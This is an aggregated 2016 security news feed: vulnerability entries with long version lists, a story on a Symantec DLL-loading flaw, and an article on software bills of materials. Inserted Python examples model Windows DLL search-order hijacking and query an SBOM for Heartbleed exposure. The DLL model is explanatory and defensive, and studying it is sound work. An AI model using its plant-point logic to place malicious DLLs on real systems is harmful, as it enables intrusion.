libTIFF CVE-2016-8331 Type Confusion Remote Code Execution Vulnerability

Bugtraq ID: 93898
Class: Boundary Condition Error
CVE: CVE-2016-8331
Remote: Yes
Local: No
Published: Oct 25 2016 12:00AM
Updated: Nov 20 2016 12:03AM
Credit: Tyler Bohan and Cory Duplantis.
Vulnerable: LibTIFF LibTIFF 4.0.6
Not Vulnerable:


SecurityFocus Vulnerabilities

In an already troubled year for Symantec, the company reported another major vulnerability in three of its enterprise security products.

Found in IT Management Suite 8.0, Ghost Solution Suite 3.1 and Endpoint Virtualization 7.x, the flaw is a dynamic link library (DLL) loading issue that can be exploited in two ways. First, an "authorized, but nonprivileged" user who can write to a directory on the loader's search path could have a malicious DLL executed in place of the legitimate one. Second, an outside attacker could trick an authorized user into clicking an email link that downloads the malicious code. "Ultimately, this problem is caused by a failure to use an absolute path when loading DLLs during product boot up/reboot," Symantec said in its security advisory.

DLL preloading vulnerabilities are common and are often treated as a lesser threat to enterprises, but Symantec rated this one high severity. Symantec has not reported any exploitation in the wild and has released product updates that fix the issue for all three products.

However, the discovery of this flaw, listed as CVE-2016-6590, is the latest in a growing line of Symantec security product vulnerabilities found this year. While the DLL flaw was unearthed by Himanshu Mehta, senior threat analysis engineer at Symantec, the three prior batches of flaws were reported by Google Project Zero's Tavis Ormandy.

The previous flaws include an easily exploitable one in the core scanning engine used in most Symantec and Norton antivirus products, as well as a vulnerability -- found just weeks after the first -- caused by unpatched, third-party open source software that was said to be "as bad as it gets" by Ormandy. The most recent set of Symantec bugs were in the file parser component of its antivirus decomposer engine.

In its vulnerability report for the DLL flaw, Symantec recommended several best practices for users of the affected products to reduce the threat, including restricting access to administrative or management systems to authorized privileged users, implementing the principle of least privilege and restricting remote access to only authorized systems.
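To make the search-order problem Symantec describes concrete, the following Python model is an added example written for this page (it is not Symantec's code and does not reproduce the affected products' logic). It walks the default Windows DLL search order and reports which directories a low-privileged user could plant a DLL into so that the loader binds it before, or instead of, the legitimate copy. The directory names, the file inventory and the set of writable directories are constructed assumptions; the point being demonstrated is that an unqualified name such as `version.dll` is resolved by walking the search path, while an absolute path is checked in place and never walks it.

```python
"""Model of Windows DLL search-order hijacking (added example, constructed data)."""
import ntpath

# Default system directories, in the order the loader consults them.
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows"]

# Constructed environment (assumptions for the example, not a real host):
APP_DIR = r"C:\Program Files\ExampleSuite"      # where the product's EXE lives
DOWNLOADS = r"C:\Users\alice\Downloads"         # cwd when launched from a downloaded file
PATH_DIRS = [r"C:\Tools"]                        # %PATH% entries beyond the system dirs
FILES = {                                        # directory -> lowercase file names present
    APP_DIR: {"product.exe", "helper.dll"},
    r"C:\Windows\System32": {"kernel32.dll", "version.dll"},
}


def search_order(app_dir, cwd, path_dirs, safe_search=True):
    """Directories searched, in order, for an unqualified DLL name.

    With SafeDllSearchMode (the default since Windows XP SP2) the current
    directory is consulted only after the system directories; with it off,
    the current directory comes right after the application directory.
    """
    if safe_search:
        return [app_dir, *SYSTEM_DIRS, cwd, *path_dirs]
    return [app_dir, cwd, *SYSTEM_DIRS, *path_dirs]


def resolve_dll(requested, order, files=FILES):
    """Path the loader would bind, or None if the DLL is not found.

    An absolute path is checked in place and never walks the search order;
    that is the fix the Symantec advisory points at.
    """
    if ntpath.isabs(requested):
        directory, name = ntpath.split(requested)
        return requested if name.lower() in files.get(directory, set()) else None
    for directory in order:
        if requested.lower() in files.get(directory, set()):
            return ntpath.join(directory, requested)
    return None


def hijack_points(requested, order, writable, files=FILES):
    """Directories where a user who can write only to `writable` can plant
    (or replace) a DLL that the loader will pick before or instead of the
    legitimate one. An empty list means planting cannot change what loads.
    """
    if ntpath.isabs(requested):
        directory, _ = ntpath.split(requested)
        return [directory] if directory in writable else []
    points = []
    for directory in order:
        if directory in writable:
            points.append(directory)           # searched before (or at) the real copy
        if requested.lower() in files.get(directory, set()):
            break                               # found here; later dirs are never searched
    return points


if __name__ == "__main__":
    order = search_order(APP_DIR, DOWNLOADS, PATH_DIRS)
    print("version.dll binds to:", resolve_dll("version.dll", order))
    print("plant points, weak install-dir ACL:", hijack_points("version.dll", order, {APP_DIR}))
    print("plant points, phantom DLL:", hijack_points("missing.dll", order, {DOWNLOADS}))
    print("plant points, absolute path:",
          hijack_points(r"C:\Windows\System32\version.dll", order, {APP_DIR, DOWNLOADS}))
```

Two things fall out of the model. With SafeDllSearchMode on, a file dropped into the user's Downloads folder only wins for a DLL that exists nowhere else on the search path (a "phantom" DLL), while a weakly permissioned install directory wins for any unqualified name because it is searched first. Loading by absolute path removes both cases, which is why the advisory frames the root cause the way it does.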

In other news:

  • A gamer seeking revenge might be responsible for the Oct. 21 attack on Domain Name System (DNS) provider Dyn that shut down parts of the internet. In his testimony for a House Energy and Commerce Committee hearing, Level 3 Communications Inc. CSO Dale Drew said the attack was likely the work of a single individual who was specifically targeting the PlayStation Network. "We believe that in the case of Dyn, the relatively unsophisticated attacker sought to take offline a gaming site with which it had a personal grudge," Drew said. The attacker used the Mirai malware to take control of more than 150,000 internet-of-things devices and launch a distributed denial-of-service attack that overwhelmed Dyn's systems, interrupting service to major websites such as Twitter, Reddit and Netflix.
  • United States Director of National Intelligence James Clapper submitted his letter of resignation on Nov. 16. Clapper oversees 17 different agencies, including the CIA, FBI and National Security Agency, and he is the lead intelligence adviser to President Barack Obama. Clapper -- who is 75 years old and has held the position for six years -- announced his decision to resign in a Congressional hearing, and the Office of the DNI confirmed it on Twitter the following morning. Clapper was a central figure in the debate over government surveillance following the Edward Snowden revelations. He received criticism from lawmakers, security experts and privacy advocates for testifying before Congress in 2013 about the NSA's spying programs, claiming the agency did not engage in bulk data collection on millions of Americans. Clapper's resignation goes into effect at noon on Jan. 20, 2017.
  • Gavin Andresen, chief scientist at the Bitcoin Foundation, has regrets about getting involved in Craig Wright's attempts to prove he created the digital currency bitcoin. Andresen backed Wright's claim to be the mysterious Satoshi Nakamoto -- which he has failed to prove on multiple occasions -- and even defended Wright after his claims were debunked. Andresen has kept a relatively low profile since Wright's last failure six months ago, but posted a brief statement on his blog on Nov. 16. "So, either he was or he wasn't," Andresen wrote on whether or not Wright is Satoshi. "In either case, we should ignore him. I regret ever getting involved in the 'who was Satoshi' game, and am going to spend my time on more fun and productive pursuits."
  • The ransomware known as Crysis suffered a blow Nov. 13, when the master decryption keys were made available to the public after being posted on BleepingComputer forums. Crysis first surfaced in February 2016 when ESET researchers found it was filling in for the receding TeslaCrypt ransomware. According to ESET's report, Crysis is able to "encrypt files on fixed, removable and network drives. It uses strong encryption algorithms and a scheme that makes it difficult to crack in reasonable time." This ransomware was spread primarily through attachments to spam emails, but now its victims have an opportunity to recover what they've lost. The decryption keys -- posted by a BleepingComputer user known only as crss7777 -- cover Crysis versions 2 and 3, and Kaspersky Lab has already added them to the Rakhni decryptor.


SearchSecurity: Security Wire Daily News

Vulnerable: SuSE Linux Enterprise Server 11 SP2 LTSS
QEMU QEMU 0
IBM PowerKVM 2.1.1 SP3
IBM PowerKVM 2.1.1 Build 65.7
IBM PowerKVM 2.1.1 Build 65.6
IBM PowerKVM 2.1.1 Build 65.5
IBM PowerKVM 2.1.1 Build 65.4
IBM PowerKVM 2.1.1 build 57
IBM PowerKVM 3.1.0.2
IBM PowerKVM 3.1 SP2
IBM PowerKVM 3.1 SP1
IBM PowerKVM 3.1 Build 3
IBM PowerKVM 3.1 Build 2
IBM PowerKVM 3.1
IBM PowerKVM 2.1.1.3-65.10
IBM PowerKVM 2.1.1.3-65
IBM PowerKVM 2.1.1 SP2 (build 51)
IBM PowerKVM 2.1.1 Build 65.1
IBM PowerKVM 2.1.1 build 58
IBM PowerKVM 2.1
Gentoo Linux


SecurityFocus Vulnerabilities

Vulnerable: Xen Xen 4.6
Xen Xen 4.5.0
Xen Xen 4.4.1
Xen Xen 4.4.0
Xen Xen 4.3.1
Xen Xen 4.3.0
Redhat Enterprise Virtualization 0
Redhat Enterprise Linux Workstation 7
Redhat Enterprise Linux Virtualization 5 Server
Redhat Enterprise Linux Server EUS 7.2
Redhat Enterprise Linux Server AUS 7.2
Redhat Enterprise Linux Server 7
Redhat Enterprise Linux HPC Node EUS 7.2
Redhat Enterprise Linux HPC Node 7
Redhat Enterprise Linux Desktop Multi OS 5 client
Redhat Enterprise Linux Desktop 7
QEMU QEMU 0
Oracle VM Server for x86 3.4
Oracle VM Server for x86 3.3
Oracle VM Server for x86 3.2
Oracle Enterprise Linux 5
HP Helion OpenStack 2.1.4
HP Helion OpenStack 2.1.2
HP Helion OpenStack 2.1
HP Helion OpenStack 2.0
Citrix XenServer 6.0.2 Common Criteria
Citrix XenServer 6.0.2
Citrix XenServer 6.5 Service Pack 1
Citrix XenServer 6.5
Citrix XenServer 6.2 Service Pack 1
Citrix XenServer 6.2
Citrix XenServer 6.1
Citrix XenServer 6.0


SecurityFocus Vulnerabilities

Writing secure applications doesn't mean simply checking the code you've written to make sure there are no logic errors or coding mistakes. Attackers are increasingly targeting vulnerabilities in third-party libraries as part of their attacks, so you have to check the safety of all the dependencies and components, too.

In manufacturing, companies create a bill of materials, listing in detail all the items included when building a product so that buyers know exactly what they're buying. Processed food packaging, for example, typically tells you what's inside so that you can make an informed buying decision.


When it comes to software, untangling the code to know what libraries are in use and which dependencies exist is hard. It's a challenge most IT teams don't have the time or resources to unravel.

"You don't want to purchase spoiled food, buy a car with defective air bags, or have a relative receive a defective pacemaker," says Derek Weeks, vice president and devops advocate at Sonatype, a software supply chain automation provider. Yet we surprisingly don't demand the same rules for software.

Tell me what's inside

At the very least, a software bill of materials should describe the components included in the application, the version and build of the components in use, and the license types for each component.

To take one example, IT administrators would have had a far easier time back in April 2014 when the Heartbleed vulnerability was initially disclosed if they'd had a bill of materials on hand for every application running in their environment. Instead of testing every application to determine whether OpenSSL was included, IT could have checked the list and known right away which ones depended on the vulnerable version and needed action.

Other nice-to-have information would be details like the location within the source code where that component is being called, the list of all tools used to build the application, and relevant build scripts.

Today's developers rely heavily on open source and other third-party components, and an estimated 80 to 90 percent of an application may consist of code written by someone else. According to statistics collected by Sonatype, the average application has 106 components. It doesn't matter that the problem is in one of those components rather than in code the organization wrote: the organization is responsible for the entire software chain and is on the hook if a vulnerability in the library results in a security incident.

Black boxes

When organizations buy software -- either commercial or open source -- they have only limited visibility into which components are in use. Especially diligent teams may look at the code to see which libraries are included, but libraries call other components, and the chain easily goes more than two levels deep.

"People aren't even sure what they're using, especially when libraries call other libraries that they don't even know about," says Mark Curphey, CEO of software security company Sourceclear.

As many as one in 16 components used by development teams has a known security defect, according to Sonatype's 2016 State of the Software Supply Chain report. It's the equivalent of being told 6 percent of the parts used in building a car were defective, but nobody knew which part or who supplied it, Weeks says. A car owner would not accept that answer, nor should software owners.

Some software buyers are taking a stand. Both Exxon and the Mayo Clinic, for example, require software suppliers to provide a software bill of materials in order to discover potential security and licensing problems or whether the application is using an outdated version of the library.

When such problems are found, an administrator can ask the supplier to rebuild the application with the newer version. While waiting for the updated software, IT has the opportunity to put in temporary mitigations to protect the application from attackers looking to exploit the vulnerability. A software bill of materials also helps administrators perform spot checks of applications and code whenever a vulnerability is disclosed or a core library, such as OpenSSL, releases a new version.

Just because a component doesn't have any known bugs at the moment is not an argument for its safety. Some components may be at the latest available version but are several years old. If administrators and developers have the right information, they can decide whether or not they want to risk using an application containing an old, possibly unsupported, component.

Similar, but different programs

Understanding what components are being used is not only an open source software problem. Several efforts are underway to establish certification and testing laboratories focused on the security of software. Unlike the bill of materials, which helps software owners stay on top of maintenance and updates, these efforts focus on assisting buyers with the purchase decisions.

Underwriters Laboratories rolled out a voluntary Cybersecurity Assurance Program (UL CAP) earlier this year for internet of things and critical infrastructure vendors to assess security vulnerabilities and weaknesses in their products against a set of security standards. UL CAP can be used as a procurement tool for buyers of critical infrastructure and IoT equipment. ICSA Labs has a similar IoT Certification Testing program that tests IoT devices on how they handle alerting/logging, cryptography, authentication, communications, physical security, and platform security. An ICSA Labs certification means that the product underwent the testing program and that the vulnerabilities and weaknesses found were fixed.

The Online Trust Alliance has an IoT Trust Framework, which is a set of specifications IoT manufacturers should follow in order to build security and privacy -- such as unique passwords, encrypted traffic, and patching mechanisms -- into their connected devices. The framework will eventually become a global certification program, but for the moment, it's more of a guidance on what to do correctly.

At this year's Black Hat conference, Peiter Zatko, the famous hacker known as Mudge, and Sarah Zatko unveiled a Consumer Reports-style ratings system, Cyber Independent Testing Lab, to measure the relative security and difficulty of exploitation for various applications. CITL's methodology includes looking for known bad functions and how often the application uses them, as well as comparing how frequently good functions are called as opposed to the bad ones.

"We as security practitioners tend to focus on exploitability, but as a consumer of a product, they're almost always going to say disruptability is what bothers them," Zatko said during his presentation. The plan is to release large-scale fuzzing results by the end of 2017.

Track ingredients for better security

Attackers have shifted their focus upstream to the components, because a vulnerability in a widely used library yields more victims than one in a single application. The Java deserialization flaw in the Apache Commons Collections library is a good example of how such flaws get missed. An administrator may think there's nothing to worry about because the organization doesn't run JBoss, not realizing that another application they rely on bundles the same vulnerable collections code and is just as susceptible.

A software bill of materials helps administrators gain visibility into the components used in applications and discover potential security and licensing problems. More important, administrators can use the list to spot-check applications and code from suppliers to obtain an accurate view of potential vulnerabilities and weaknesses, as well as roll out patches in a timely manner.
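The lookup the article keeps returning to, as an added example (this is code written for this page, not InfoWorld's, Sonatype's or Sourceclear's tooling): a small bill of materials recording component, version, license and release date is queried for the Heartbleed range of OpenSSL. The query walks transitive `requires` edges, so an application that only ships libcurl is still flagged when libcurl links a vulnerable OpenSSL; that is the "libraries call other libraries" problem from the Black boxes section and the same shape as the Commons Collections case above, where the vulnerable code arrives inside another application. A second query flags components for age even when no bug is known, as the text suggests. The applications, components, licenses and release dates are a constructed inventory, and the version comparison assumes OpenSSL's dotted-number-plus-letter scheme.

```python
"""Querying a software bill of materials for a library advisory (added example)."""
import re
from collections import deque
from datetime import date

# Constructed inventory: four internal applications and the components they ship.
# Versions, licenses and release dates are illustrative, not a real environment.
APPLICATIONS = {
    "billing-portal": ["openssl 1.0.1e", "libcurl 7.36.0"],
    "hr-intranet": ["libcurl 7.36.0"],           # pulls OpenSSL in only transitively
    "build-agent": ["openssl 1.0.1g"],
    "legacy-reports": ["openssl 0.9.8y"],
}
COMPONENTS = {
    "openssl 1.0.1e": {"license": "OpenSSL", "released": date(2013, 2, 11), "requires": []},
    "openssl 1.0.1g": {"license": "OpenSSL", "released": date(2014, 4, 7), "requires": []},
    "openssl 0.9.8y": {"license": "OpenSSL", "released": date(2013, 2, 5), "requires": []},
    "libcurl 7.36.0": {"license": "MIT", "released": date(2014, 3, 26),
                       "requires": ["openssl 1.0.1e"]},
}

# Heartbleed (CVE-2014-0160) affected OpenSSL 1.0.1 through 1.0.1f inclusive.
HEARTBLEED = {"component": "openssl", "first": "1.0.1", "last": "1.0.1f"}

_VERSION = re.compile(r"^(\d+(?:\.\d+)*)([a-z]?)$")


def version_key(version):
    """Sortable key for dotted versions with an optional OpenSSL-style letter suffix.

    Numeric parts are padded to four so that '1.0' and '1.0.1' compare cleanly
    (assumes at most four dotted fields, which holds for this inventory).
    """
    m = _VERSION.match(version)
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    nums = [int(p) for p in m.group(1).split(".")]
    nums += [0] * (4 - len(nums))
    return (*nums, m.group(2))


def in_range(version, first, last):
    """True when version lies in the inclusive [first, last] range."""
    return version_key(first) <= version_key(version) <= version_key(last)


def component_closure(app):
    """Every component an application ships, directly or transitively, mapped to
    one dependency path that reaches it (breadth-first, so the shortest path)."""
    paths = {}
    queue = deque((c, [c]) for c in APPLICATIONS[app])
    while queue:
        comp, path = queue.popleft()
        if comp in paths:
            continue
        paths[comp] = path
        queue.extend((dep, path + [dep]) for dep in COMPONENTS[comp]["requires"])
    return paths


def affected_apps(advisory):
    """Applications shipping a version inside the advisory's range, each with the
    dependency path(s) that explain why. This is the lookup IT lacked during Heartbleed."""
    hits = {}
    for app in APPLICATIONS:
        for comp, path in component_closure(app).items():
            name, version = comp.split(" ", 1)
            if name == advisory["component"] and in_range(
                    version, advisory["first"], advisory["last"]):
                hits.setdefault(app, []).append(path)
    return hits


def stale_components(as_of, max_age_days):
    """Components released more than max_age_days before as_of: no known bug,
    but old enough that support and fixes may no longer be coming."""
    return sorted(c for c, meta in COMPONENTS.items()
                  if (as_of - meta["released"]).days > max_age_days)


if __name__ == "__main__":
    for app, paths in affected_apps(HEARTBLEED).items():
        for path in paths:
            print(f"{app}: {' -> '.join(path)}")
    print("older than 1000 days:", stale_components(date(2016, 11, 21), 1000))
```

Note what the transitive walk buys: `hr-intranet` lists no OpenSSL at all, and a grep of its declared dependencies would have cleared it, yet it is flagged through libcurl. The staleness query is deliberately separate from the advisory query, because the two questions ("is this known-bad?" and "is anyone still maintaining this?") have different answers and different owners.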


InfoWorld Security

Multiple VMware Workstation Products CVE-2016-7085 DLL Loading Remote Code Execution Vulnerability

Bugtraq ID: 92940
Class: Design Error
CVE: CVE-2016-7085
Remote: Yes
Local: No
Published: Sep 13 2016 12:00AM
Updated: Sep 13 2016 12:00AM
Credit: Stefan Kanthak, Anand Bhat, and Himanshu Mehta.
Vulnerable: VMWare Workstation Pro 12.1.1
VMWare Workstation Pro 12.1
VMWare Workstation Player 12.1.1
VMWare Workstation Player 12.1
Not Vulnerable: VMWare Workstation Pro 12.5.0
VMWare Workstation Player 12.5


SecurityFocus Vulnerabilities

Vulnerable: Oracle Mysql 5.7.15
Oracle Mysql 5.7.12
Oracle Mysql 5.7.9
Oracle Mysql 5.7.8
Oracle Mysql 5.7.7
Oracle Mysql 5.7.6
Oracle Mysql 5.7.5
Oracle Mysql 5.7.4
Oracle Mysql 5.7.3
Oracle Mysql 5.7.2
Oracle Mysql 5.5.52
Oracle Mysql 5.5.49
Oracle Mysql 5.5.46
Oracle Mysql 5.5.45
Oracle Mysql 5.5.44
Oracle Mysql 5.5.43
Oracle Mysql 5.5.42
Oracle Mysql 5.5.41
Oracle Mysql 5.5.40
Oracle Mysql 5.5.39
Oracle Mysql 5.5.38
Oracle Mysql 5.5.37
Oracle Mysql 5.5.36
Oracle Mysql 5.5.35
Oracle Mysql 5.5.32
Oracle Mysql 5.5.31
Oracle Mysql 5.5.28
Oracle Mysql 5.5.27
Oracle Mysql 5.5.25
Oracle Mysql 5.5.24
Oracle Mysql 5.5.23
Oracle Mysql 5.5.22
Oracle Mysql 5.5.21
Oracle Mysql 5.5.20
Oracle Mysql 5.5.19
Oracle Mysql 5.5.18
Oracle Mysql 5.5.17
Oracle Mysql 5.5.16
Oracle Mysql 5.5.15
Oracle Mysql 5.5.14
Oracle Mysql 5.5.13
Oracle Mysql 5.5.12
Oracle Mysql 5.5.11
Oracle Mysql 5.5.10
Oracle Mysql 5.7.11
Oracle Mysql 5.7.10
Oracle Mysql 5.5.48
Oracle Mysql 5.5.47
Oracle Mysql 5.5.34
Oracle Mysql 5.5.33
Oracle Mysql 5.5.30
Oracle Mysql 5.5.29
Oracle Mysql 5.5.26


SecurityFocus Vulnerabilities

Bugtraq ID: 89192
Class: Unknown
CVE: CVE-2016-0376
Remote: Yes
Local: No
Published: Apr 27 2016 12:00AM
Updated: Aug 16 2016 06:00PM
Credit: Adam Gowdiak of Security Explorations
Vulnerable: Redhat Enterprise Linux Workstation Supplementary 7
Redhat Enterprise Linux Workstation Supplementary 6
Redhat Enterprise Linux Supplementary 5 server
Redhat Enterprise Linux Server Supplementary EUS 6.7.z
Redhat Enterprise Linux Server Supplementary 7
Redhat Enterprise Linux Server Supplementary 6
Redhat Enterprise Linux HPC Node Supplementary 7
Redhat Enterprise Linux HPC Node Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 7
Redhat Enterprise Linux Desktop Supplementary 6
Redhat Enterprise Linux Desktop Supplementary 5 client
IBM Vios 2.2
IBM Tivoli Composite Application Manager for Transactions 7.4
IBM Tivoli Composite Application Manager for Transactions 7.3.0
IBM Tivoli Application Dependency Discovery Manager 7.2.1 3
IBM Tivoli Application Dependency Discovery Manager 7.2.1 2
IBM Tivoli Application Dependency Discovery Manager 7.2.1 1
IBM Tivoli Application Dependency Discovery Manager 7.2.1
IBM Tivoli Application Dependency Discovery Manager 7.3.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.2.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.6
IBM Tivoli Application Dependency Discovery Manager 7.2.1.5
IBM Tivoli Application Dependency Discovery Manager 7.2.1.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.9
IBM Tivoli Application Dependency Discovery Manager 7.2.0.8
IBM Tivoli Application Dependency Discovery Manager 7.2.0.7
IBM Tivoli Application Dependency Discovery Manager 7.2.0.6
IBM Tivoli Application Dependency Discovery Manager 7.2.0.5
IBM Tivoli Application Dependency Discovery Manager 7.2.0.4
IBM Tivoli Application Dependency Discovery Manager 7.2.0.3
IBM Tivoli Application Dependency Discovery Manager 7.2.0.2
IBM Tivoli Application Dependency Discovery Manager 7.2.0.10
IBM Tivoli Application Dependency Discovery Manager 7.2.0.1
IBM Tivoli Application Dependency Discovery Manager 7.2.0
IBM Tivoli Access Manager for e-business 6.1.1
IBM Tivoli Access Manager for e-business 6.1
IBM Tivoli Access Manager for e-business 6.0
IBM SmartCloud Entry 3.2
IBM SmartCloud Entry 3.1
IBM SmartCloud Entry 3.2.0.4 JRE Update 8
IBM SmartCloud Entry 3.2.0.3
IBM SmartCloud Entry 3.2.0.2
IBM SmartCloud Entry 3.2.0.1
IBM SmartCloud Entry 3.1.0.4 JRE Update 1
IBM SmartCloud Entry 3.1.0.3
IBM SmartCloud Entry 3.1.0.2
IBM SmartCloud Entry 3.1.0.1
IBM SmartCloud Entry 2.4.0.5 JRE Update 5
IBM SmartCloud Entry 2.4.0.3 Appliance FP
IBM SmartCloud Entry 2.4.0
IBM SmartCloud Entry 2.3.0.3 JRE Update 5
IBM SmartCloud Entry 2.3.0
IBM Security Access Manager for Web 8.0
IBM Security Access Manager for Web 7.0
IBM Security Access Manager for Mobile 8.0.0.3
IBM Security Access Manager for Mobile 8.0.0.2
IBM Security Access Manager for Mobile 8.0.0.1
IBM Security Access Manager for Mobile 8.0.0.0
IBM Security Access Manager 9.0.0.1
IBM Security Access Manager 9.0
IBM Rational Software Architect 9.1.2
IBM Rational Software Architect 8.5.5
IBM Rational Software Architect 8.5.1
IBM Rational Software Architect 9.5.0.1
IBM Rational Software Architect 9.5
IBM Rational Software Architect 9.1.2.1
IBM Rational Software Architect 9.1.1
IBM Rational Software Architect 9.1
IBM Rational Software Architect 9.0.0.1
IBM Rational Software Architect 9.0
IBM Rational Software Architect 8.5.5.4
IBM Rational Software Architect 8.5.5.3
IBM Rational Software Architect 8.5.5.2
IBM Rational Software Architect 8.5.5.1
IBM Rational Software Architect 8.5
IBM Rational Functional Tester 8.3 2
IBM Rational Functional Tester 8.6.0.7
IBM Rational Functional Tester 8.6.0.6
IBM Rational Functional Tester 8.6.0.5
IBM Rational Functional Tester 8.6.0.4
IBM Rational Functional Tester 8.6.0.3
IBM Rational Functional Tester 8.6.0.2
IBM Rational Functional Tester 8.6.0.1
IBM Rational Functional Tester 8.6
IBM Rational Functional Tester 8.5.1.3
IBM Rational Functional Tester 8.5.1.2
IBM Rational Functional Tester 8.5.1.1
IBM Rational Functional Tester 8.5.1
IBM Rational Functional Tester 8.5.0.1
IBM Rational Functional Tester 8.5
IBM Rational Functional Tester 8.3.0.1
IBM Rational Functional Tester 8.3
IBM Rational Developer for Power Systems Software 8.5.1
IBM Rational Developer for Power Systems Software 8.5
IBM Rational Developer for i 9.1.1
IBM Rational Developer for i 9.0 1
IBM Rational Developer for i 9.5.0.3
IBM Rational Developer for i 9.5.0.2
IBM Rational Developer for i 9.5.0.1
IBM Rational Developer for i 9.5
IBM Rational Developer for i 9.1.1.1
IBM Rational Developer for i 9.1
IBM Rational Developer for i 9.0.1
IBM Rational Developer for i 9.0
IBM Rational Developer for C/C++ 9.1.1
IBM Rational Developer for C/C++ 9.0.1
IBM Rational Developer for C/C++ 9.1.1.2
IBM Rational Developer for C/C++ 9.1
IBM Rational Developer for C/C++ 9.0.0.1
IBM Rational Developer for C/C++ 9.0
IBM Rational Developer for AIX and Linux 9.1.1
IBM Rational Developer for AIX and Linux 9.0 1
IBM Rational Developer for AIX and Linux 9.1.1.2
IBM Rational Developer for AIX and Linux 9.1.1.1
IBM Rational Developer for AIX and Linux 9.1
IBM Rational Developer for AIX and Linux 9.0.1
IBM Rational Developer for AIX and Linux 9.0
IBM Rational Developer for AIX and COBOL 9.1.1
IBM Rational Developer for AIX and COBOL 9.0.1
IBM Rational Developer for AIX and COBOL 9.1.1.2
IBM Rational Developer for AIX and COBOL 9.1
IBM Rational Developer for AIX and COBOL 9.0.0.1
IBM Rational Developer for AIX and COBOL 9.0
IBM QRadar 7.2
IBM QRadar 7.1
IBM OS Image for Red Hat 2.1.5.0
IBM OS Image for Red Hat 2.1.0.2
IBM OS Image for Red Hat 2.1.0.1
IBM OS Image for Red Hat 2.1.0.0
IBM OS Image for Red Hat 2.0.0.4
IBM OS Image for Red Hat 2.0.0.3
IBM OS Image for Red Hat 2.0.0.2
IBM OS Image for Red Hat 2.0.0.1
IBM OS Image for AIX 2.1.5.0
IBM OS Image for AIX 2.1.1.0
IBM OS Image for AIX 2.0.0.1
IBM OS Image for AIX 1.1.5.0
IBM Notes Standard Client 9.0.1 FP5 IF3
IBM Notes Standard Client 9.0.1
IBM Notes Standard Client 8.5.3 FP6IF10
IBM Notes Standard Client 8.5.3
IBM Notes Standard Client 8.5.2
IBM Notes Standard Client 8.5.1
IBM Notes Standard Client 9.0
IBM Notes Standard Client 8.5
IBM Java SDK 1.4.2
IBM Java SDK 8.0.1.10
IBM Java SDK 8.0.1.1
IBM Java SDK 8.0 SR2 FP10
IBM Java SDK 8.0
IBM Java SDK 8 SR2 FP10
IBM Java SDK 8 SR1-FP1
IBM Java SDK 8 SR1
IBM Java SDK 8 SR 2
IBM Java SDK 8 SR 1 FP 10
IBM Java SDK 8 SR 1 FP 1
IBM Java SDK 7R1 SR3-FP1
IBM Java SDK 7R1 SR3 FP30
IBM Java SDK 7R1 SR3
IBM Java SDK 7R1 SR2-FP10
IBM Java SDK 7R1 SR2
IBM Java SDK 7R1 SR1
IBM Java SDK 7R1 SR 3 FP 20
IBM Java SDK 7R1 SR 3 FP 10
IBM Java SDK 7R1 SR 3 FP 1
IBM Java SDK 7.1.3.30
IBM Java SDK 7.1.3.20
IBM Java SDK 7.1.3.10
IBM Java SDK 7.1.3.1
IBM Java SDK 7.1.2.10
IBM Java SDK 7.1.1.0 ~~Technology
IBM Java SDK 7.1.0.0 ~~Technology
IBM Java SDK 7.1 SR3 FP30
IBM Java SDK 7.1
IBM Java SDK 7.0.9.30
IBM Java SDK 7.0.9.20
IBM Java SDK 7.0.9.10
IBM Java SDK 7.0.9.1
IBM Java SDK 7.0.8.10
IBM Java SDK 7.0.7.0 ~~Technology
IBM Java SDK 7.0.6.1 ~~Technology
IBM Java SDK 7.0.6.0 ~~Technology
IBM Java SDK 7.0.5.0 ~~Technology
IBM Java SDK 7.0.4.2 ~~Technology
IBM Java SDK 7.0.4.1 ~~Technology
IBM Java SDK 7.0.4.0 ~~Technology
IBM Java SDK 7.0.3.0 ~~Technology
IBM Java SDK 7.0.2.0 ~~Technology
IBM Java SDK 7.0.1.0 ~~Technology
IBM Java SDK 7.0.0.0 ~~Technology
IBM Java SDK 7.0 SR8-FP10
IBM Java SDK 7.0
IBM Java SDK 7 SR9-FP1
IBM Java SDK 7 SR9 FP30
IBM Java SDK 7 SR9
IBM Java SDK 7 SR8-FP10
IBM Java SDK 7 SR8
IBM Java SDK 7 SR7
IBM Java SDK 7 SR5
IBM Java SDK 7 SR4-FP2
IBM Java SDK 7 SR4-FP1
IBM Java SDK 7 SR4
IBM Java SDK 7 SR3
IBM Java SDK 7 SR2
IBM Java SDK 7 SR1
IBM Java SDK 7 SR 9 FP 20
IBM Java SDK 7 SR 9 FP 10
IBM Java SDK 7 SR 9 FP 1
IBM Java SDK 7 R1
IBM Java SDK 7
IBM Java SDK 6R1 SR8-FP5
IBM Java SDK 6R1 SR8-FP4
IBM Java SDK 6R1 SR8-FP3
IBM Java SDK 6R1 SR8-FP2
IBM Java SDK 6R1 SR8 FP20
IBM Java SDK 6R1 SR8
IBM Java SDK 6R1 SR 8 FP 7
IBM Java SDK 6R1 SR 8 FP 5
IBM Java SDK 6R1 SR 8 FP 15
IBM Java SDK 6.1.8.7
IBM Java SDK 6.1.8.5
IBM Java SDK 6.1.8.4
IBM Java SDK 6.1.8.3
IBM Java SDK 6.1.8.20
IBM Java SDK 6.1.8.2
IBM Java SDK 6.1.8.15
IBM Java SDK 6.0.9.2 ~~Technology
IBM Java SDK 6.0.9.1 ~~Technology
IBM Java SDK 6.0.9.0 ~~Technology
IBM Java SDK 6.0.8.1 ~~Technology
IBM Java SDK 6.0.8.0 ~~Technology
IBM Java SDK 6.0.7.0 ~~Technology
IBM Java SDK 6.0.6.0 ~~Technology
IBM Java SDK 6.0.5.0 ~~Technology
IBM Java SDK 6.0.4.0 ~~Technology
IBM Java SDK 6.0.3.0 ~~Technology
IBM Java SDK 6.0.2.0 ~~Technology
IBM Java SDK 6.0.16.7
IBM Java SDK 6.0.16.5
IBM Java SDK 6.0.16.4
IBM Java SDK 6.0.16.3
IBM Java SDK 6.0.16.20
IBM Java SDK 6.0.16.2
IBM Java SDK 6.0.16.0 ~~Technolog
IBM Java SDK 6.0.15.1 ~~Technolog
IBM Java SDK 6.0.15.0 ~~Technolog
IBM Java SDK 6.0.14.0 ~~Technolog
IBM Java SDK 6.0.13.2 ~~Technolog
